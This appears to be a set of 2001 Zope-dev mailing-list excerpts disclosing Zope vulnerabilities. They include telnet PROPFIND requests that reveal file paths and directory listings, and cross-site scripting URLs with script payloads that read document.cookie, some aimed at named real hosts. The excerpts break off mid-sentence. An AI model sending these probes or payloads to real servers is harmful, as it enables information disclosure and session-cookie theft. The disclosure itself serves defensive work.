[Zope-dev] Vulnerability in Zope

Found vulnerability: retrieve a full path to local files in Zope. ---[ Example 1 (Linux): telnet www.zope.org 80 PROPFIND / HTTP/1.0 F G H J K L HTTP/1.0 500 Internal Server Error Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1 Date: Mon, 10 Sep 2001 15:38:59 GMT

[Zope-dev] New: Cross Site Scripting vulnerability

Example: http://www.zope.org/Documentation/SCRIPTalert(document.domain)/SCRIPT http://www.zope.org/lalalalalSCRIPTalert(document.domain)/SCRIPT http://www.zope.org/SCRIPTalert(document.cookie)/SCRIPT For example, an attacker might post a message like Hello message board. This is a

[Zope-dev] Vulnerability: attacking can get file list and directory

Vulnerability: attacking can get file list and directory Tested on Win32 platform Example: telnet zopeserver 8080 PROPFIND / HTTP/1.0 enter enter enter list files and directory This tested on my site: security.instock.ru 8080 ___ Zope-Dev